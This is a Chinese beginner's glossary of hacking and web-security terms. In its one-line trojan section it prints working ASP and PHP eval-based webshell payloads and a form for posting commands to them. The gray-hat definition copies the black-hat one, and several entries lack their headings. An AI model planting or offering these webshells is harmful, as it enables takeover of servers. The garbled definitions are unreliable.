基础知识科普
黑客、骇客与红客
-
黑客:通常是指对计算机科学、编程和设计方面具高度理解的人。由英语Hacker音译出来,伴随着计算机和网络的发展而产生和成长。黑客并不是恶意破坏,这是一群纵横于网络上的技术人员,热衷于科技探索,计算机科学研究。在IT圈,Hacker一词无疑是带有正面意义的群体。
-
骇客:源自英文Hacker,指闯入计算机系统/软件,后来被称为 Cracker 的一类人。他们从事恶意破解商业软件,恶意入侵他人网站等事务。这一类人未必有很高的技术,通常同一些简单的攻击手段去达到一些炫耀、恶作剧、搞破坏的目的。
-
红客:中国特色产物,最早出现于北约轰炸中国驻南联盟大使馆之后。这些人用自己的技术维护国内网络安全,并对外来的一切攻击进行还击。
白帽子、黑帽子和灰帽子
-
白帽子:专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量。
-
黑帽子:专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
-
灰帽子:专门研究木马、操作系统,寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。
专业术语
1、 脚本(asp、php、jsp)
-
脚本(Script)是批处理文件的延伸,是一种纯文本保存的程序,一般来说的计算机脚本程序是确定的一系列控制计算机进行运算操作动作的组合,在其中可以实现一定的逻辑分支等。
-
简单地说就是一条条的文字命令,这些文字命令是可以看到的(如可以用记事本打开查看、编辑),脚本程序在执行时,是由系统的一个解释器,将其一条条的翻译成机器可识别的指令,并按程序顺序执行。因为脚本在执行时多了一道翻译的过程,所以它比二进制程序执行效率要稍低一些。
2、 html(css、js、html)
-
超文本标记语言,标准通用标记语言下的一个应用,是网页制作必备的编程语言。“超文本”就是指页面内可以包含图片、链接,甚至音乐、程序等非文字元素。
3、 HTTP协议
-
超文本传输协议(HyperText Transfer Protocol) 是互联网上应用最为广泛的一种网络协议。主要被用于在Web浏览器和网站服务器之间传递信息。 HTTP 是基于 TCP/IP 协议的应用层协议。
4、 CMS(B/S)
-
CMS是 “Content Management System” 的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。
5、 MD5
-
MD5 消息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。MD5 由美国密码学家罗纳德·李维斯特(Ronald Linn Rivest)设计,于1992年公开,用以取代MD4算法。
肉鸡、抓鸡
-
肉鸡:被黑客入侵并长期驻扎的计算机或者服务器。
-
抓鸡:利用大量的程序漏洞,使用自动化方式获取肉鸡的行为。
Webshell
-
通过Web入侵的一种脚本工具,可以据此对网络服务进行一定的控制。
-
硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改、控制等。
一句话【木马】
-
通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
<%eval request ("pass")%>
<%execute (request ("pass"))%>
//request ("pass"):接受客户端提交的数据,pass为执行命令的参数值。
//eval/execute:函数执行客户端命令的内容。
如: PHP的一 句话木马:
<?php eval($_ POST[oracer]) ;?>
下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等等的各种功能。
<form method=post action=http://木马地址>
<textarea name=cracer>
//这里写php代码
phpinfo() ;
</textarea>
<input type = submit>
</form>
- 操作系统低权限的账户将自己提升为管理员权限使用的方法。
- 黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。
- 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。
- 即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有: WebRobot、御剑、明小子和web在线查询等。
